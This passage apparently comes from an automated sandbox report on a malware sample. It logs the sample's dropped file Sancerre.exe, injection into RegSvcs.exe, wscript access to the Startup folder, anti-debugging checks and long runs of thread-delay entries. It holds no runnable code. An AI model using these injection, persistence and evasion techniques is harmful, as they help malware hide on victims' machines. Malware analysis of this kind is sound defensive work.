                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598995
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598215
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595747
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595524
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594874
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594218
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2117
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7691
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2533
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7313
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | API coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | API coverage: 4.2 %
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DBDBBE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC68EE FindFirstFileW,FindClose,0_2_00DC68EE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DC698F
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD076
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD3A9
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC9642
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC979D
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DC9B2B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DC5C97
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_005DDBBE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E68EE FindFirstFileW,FindClose,1_2_005E68EE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_005E698F
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD076
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD3A9
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E9642
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E979D
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_005E9B2B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E5C97 FindFirstFileW,FindNextFileW,FindClose,1_2_005E5C97
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D542DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599517
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599391
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598366
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598196
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598081
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595351
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595014
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598995Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598215Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595524Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594218Jump to behavior
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: RegSvcs.exe, 00000002.00000002.2972860518.0000000000D28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: RegSvcs.exe, 00000008.00000002.2972997519.000000000132A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05139328 LdrInitializeThunk, 2_2_05139328
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DCEAA2 BlockInput, 0_2_00DCEAA2
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D82622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00D82622
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D542DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo, 0_2_00D542DE
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D74CE8 mov eax, dword ptr fs:[00000030h] 0_2_00D74CE8
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_015D9260 mov eax, dword ptr fs:[00000030h] 0_2_015D9260
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_015D9200 mov eax, dword ptr fs:[00000030h] 0_2_015D9200
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_015D7BA0 mov eax, dword ptr fs:[00000030h] 0_2_015D7BA0
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_00594CE8 mov eax, dword ptr fs:[00000030h] 1_2_00594CE8
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_0107B178 mov eax, dword ptr fs:[00000030h] 1_2_0107B178
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_0107B1D8 mov eax, dword ptr fs:[00000030h] 1_2_0107B1D8
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_01079B18 mov eax, dword ptr fs:[00000030h] 1_2_01079B18
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 5_2_017444F0 mov eax, dword ptr fs:[00000030h] 5_2_017444F0
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 5_2_01744550 mov eax, dword ptr fs:[00000030h] 5_2_01744550
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 5_2_01742E90 mov eax, dword ptr fs:[00000030h] 5_2_01742E90
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DB0B62 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, 0_2_00DB0B62
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D82622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00D82622
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D7083F IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00D7083F
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D709D5 SetUnhandledExceptionFilter, 0_2_00D709D5
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00D70C21 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 0_2_00D70C21
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005A2622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 1_2_005A2622
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_0059083F IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 1_2_0059083F
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005909D5 SetUnhandledExceptionFilter, 1_2_005909D5
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_00590C21 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 1_2_00590C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8C9008
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D83008
